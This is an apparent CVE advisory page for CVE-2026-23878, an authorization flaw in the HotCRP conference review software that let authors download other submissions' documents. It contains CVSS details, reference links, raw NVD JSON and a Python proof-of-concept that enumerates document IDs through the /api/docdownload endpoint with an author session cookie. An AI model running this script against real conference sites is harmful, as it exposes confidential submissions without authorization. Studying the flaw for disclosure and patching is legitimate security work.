CVE-2026-23878

Description

HotCRP is conference review software. Starting in commit aa20ef288828b04550950cf67c831af8a525f508 and prior to commit ceacd5f1476458792c44c6a993670f02c984b4a0, authors with at least one submission on a HotCRP site could use the document API to download any documents (PDFs, attachments) associated with any submission. The problem was patched in commit ceacd5f1476458792c44c6a993670f02c984b4a0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hotcrp:hotcrp:3.1:*:*:*:*:*:*:* - VULNERABLE

HotCRP < commit ceacd5f1476458792c44c6a993670f02c984b4a0

HotCRP >= commit aa20ef288828b04550950cf67c831af8a525f508

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-23878 PoC - HotCRP Unauthorized Document Access
# Target: HotCRP instances with vulnerable versions
# Requirement: Valid author account with at least one submission

import requests
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

def download_document(base_url, session_cookie, submission_id, document_id):
    """Attempt to download document from HotCRP"""
    url = f"{base_url}/api/docdownload"
    cookies = {'HotCRP.session': session_cookie}
    params = {
        'p': submission_id,
        'doc': document_id
    }
    try:
        response = requests.get(url, params=params, cookies=cookies, timeout=10)
        if response.status_code == 200 and len(response.content) > 0:
            return {
                'submission_id': submission_id,
                'document_id': document_id,
                'size': len(response.content),
                'content_type': response.headers.get('Content-Type', 'unknown')
            }
    except Exception as e:
        return None
    return None

def main():
    if len(sys.argv) < 4:
        print("Usage: python poc.py <base_url> <session_cookie> <target_submission_id>")
        print("Example: python poc.py https://conference.org 1a2b3c4d... 123")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    session = sys.argv[2]
    target_id = int(sys.argv[3])
    
    print(f"[*] Scanning for documents on submission {target_id}...")
    
    # Scan document IDs (typically 1-100)
    results = []
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(download_document, base_url, session, target_id, doc_id) 
                   for doc_id in range(1, 101)]
        for future in as_completed(futures):
            result = future.result()
            if result:
                results.append(result)
                print(f"[+] Found document ID {result['document_id']} ({result['size']} bytes)")
    
    print(f"\n[*] Total documents accessible: {len(results)}")
    print("[*] Vulnerability confirmed: Unauthorized document access possible")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23878
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23878
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23878/
[4] VulDB https://vuldb.com/cve/CVE-2026-23878
[5] https://github.com/kohler/hotcrp/commit/aa20ef288828b04550950cf67c831af8a525f508
[6] https://github.com/kohler/hotcrp/commit/ceacd5f1476458792c44c6a993670f02c984b4a0
[7] https://github.com/kohler/hotcrp/security/advisories/GHSA-vh3x-xwj4-jvqx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23878", "sourceIdentifier": "[email protected]", "published": "2026-01-19T19:16:04.963", "lastModified": "2026-02-05T18:39:14.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HotCRP is conference review software. Starting in commit aa20ef288828b04550950cf67c831af8a525f508 and prior to commit ceacd5f1476458792c44c6a993670f02c984b4a0, authors with at least one submission on a HotCRP site could use the document API to download any documents (PDFs, attachments) associated with any submission. The problem was patched in commit ceacd5f1476458792c44c6a993670f02c984b4a0."}, {"lang": "es", "value": "HotCRP es un software de revisión de conferencias. A partir del commit aa20ef288828b04550950cf67c831af8a525f508 y antes del commit ceacd5f1476458792c44c6a993670f02c984b4a0, los autores con al menos una entrega en un sitio de HotCRP podían usar la API de documentos para descargar cualquier documento (PDFs, adjuntos) asociado con cualquier entrega. El problema fue parcheado en el commit ceacd5f1476458792c44c6a993670f02c984b4a0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hotcrp:hotcrp:3.1:*:*:*:*:*:*:*", "matchCriteriaId": "C49A46B9-6C68-43E5-9B50-3C271E236CDE"}]}]}], "references": [{"url": "https://github.com/kohler/hotcrp/commit/aa20ef288828b04550950cf67c831af8a525f508", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kohler/hotcrp/commit/ceacd5f1476458792c44c6a993670f02c984b4a0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kohler/hotcrp/security/advisories/GHSA-vh3x-xwj4-jvqx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}